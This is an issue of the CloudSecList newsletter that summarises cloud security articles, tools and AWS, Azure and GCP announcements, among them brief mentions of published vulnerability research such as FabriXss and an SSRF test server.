Release Date: 23/10/2022 | Issue: 160
CloudSecList is a newsletter for busy professionals who want to keep up to date with the cloud security industry. Hand-curated by Marco Lancini.

If you received it, you either subscribed or someone forwarded it to you. If you fit in the latter camp and want to subscribe, then you can click on this button:
Sign Up

📄 Software Composition Analysis Checklist 📄
Learn the 6 key components of any complete, robust software composition analysis (SCA) solution in this SCA checklist. Inside, you’ll see why not all SCA solutions are created equal, and you’ll learn how your organization can maintain holistic cloud-native security and compliance. Plus, you’ll get insights into:
  • Key SCA features you should look out for while evaluating solutions
  • Tips for mitigating common security and compliance risks
  • The benefits of a context-aware, developer-first approach to SCA
  • And more!
Get the SCA Checklist for free!

This week's articles

The Danger of Falling to System Role in AWS SDK Client   #attack, #aws
Writeup of a vulnerability identified in a web application that was using the AWS SDK for Go (v1) to implement an "Import Data From S3" functionality.

How to list all resources in your AWS account   #aws, #defend
You may have been there before: you got access to an AWS account and just want to list which resources are configured in it. The seemingly simple task of listing all resources quickly turns out to be complicated.

Untangling Azure Active Directory Principals & Access Permissions   #azure, #iam
Post untangling the question of 'who has access to what' in an Azure Active Directory environment. A PowerShell tool was also released to automatically enumerate this.

Azure Active Directory - Security Overview   #azure, #explain
A nice diagram providing an overview of the endpoints/integrations/connections/features in the Azure AD ecosystem.

PCI Compliance for Kubernetes in detail - Part 3 - Workload Security   #kubernetes, #defend
This is the 3rd part of an in-depth look at how companies running Kubernetes can approach implementing the recommendation of PCI’s guidance for container orchestration.

Guide to AWS Lambda Function URLs   #aws, #build, #explain
Post explaining AWS Lambda Function URLs - a new feature in AWS Lambda that allows you to call a Lambda function without an API Gateway.

FabriXss: How We Managed to Abuse a Custom Role User Using CSTI and Stored XSS in Azure Fabric Explorer   #attack, #azure
The Orca Research Pod has discovered FabriXss a vulnerability in Azure Service Fabric Explorer that allows attackers to gain full Administrator permissions.

Enrich AWS account data in Microsoft Sentinel   #aws, #azure, #monitor
As organisations are integrating Amazon Web Services data sources with Microsoft Sentinel, many are facing a common problem: how to identify AWS resources and handle contextual data such as AWS account information for alerts and incidents?

Pod Security Policies are dead, long live Pod Security Admission!   #defend, #kubernetes
How can we enforce security best-practices at cluster or namespace level?


Inspect a container image's root CAs. You can also refer to the companion blog post.

Automation to assess the state of your M365 tenant against CISA's baselines.

Evil OIDC server: the OpenID Configuration URL returns a 307 to cause SSRF.

A Terraform module for configuring Workload Identity for GKE clusters.

I'm writing a book! 📖
The CloudSec Engineer will be a book on how to enter, establish yourself, and thrive in the cloud security industry as an individual contributor.
You can sign up to get updates and free samples of the book as I write it at:

From the cloud providers

AWS Icon  Announcing AWS Parameters and Secrets Lambda Extension
AWS launched the AWS Parameters and Secrets Lambda Extension, a convenient method for AWS Lambda users to retrieve parameters from AWS Systems Manager Parameter Store and secrets from AWS Secrets Manager.

AWS Icon  Amazon Detective helps reduce time to investigate Amazon GuardDuty findings by grouping related findings
Detective now uses machine learning (ML) to group related GuardDuty findings that, in isolation, may have been ignored but show the lifecycle of an attack, which can help security analysts identify advanced threats more efficiently.

AWS Icon  Analyze Amazon Cognito advanced security intelligence to improve visibility and protection
How to analyze security intelligence from Amazon Cognito advanced security features logs by using AWS native services.

GCP Icon  Best kept security secrets: How Cloud EKM can help resolve the cloud trust paradox
Cloud EKM can help protect data at rest with encryption keys which are stored and managed in a third-party key management system that's outside Google Cloud's infrastructure, and ultimately outside Google's control.

GCP Icon  Backup for GKE
Backup for GKE is a service for backing up and restoring workloads in GKE clusters.

Azure Icon  Overview of the Microsoft cloud security benchmark
The Microsoft cloud security benchmark (MCSB) provides prescriptive best practices and recommendations to help improve the security of workloads, data, and services on Azure and your multi-cloud environment.

Azure Icon  Announcing Azure DNS Private Resolver general availability
Azure DNS Private Resolver now provides a fully managed recursive resolution and conditional forwarding service for Azure virtual networks.

Thanks for reading!

If you found this newsletter helpful, I'd really appreciate if you could forward it to your friends and colleagues! 👌

If you have questions, comments, or feedback, let me know on Twitter (@lancinimarco / @CloudSecList), or at!

Forward Forward
Twitter Tweet
Share Share

How did you like this issue of CloudSecList?

1       2       3       4       5

Archives View in browser Sponsorship
© 2019-present, CloudSecList by Marco Lancini.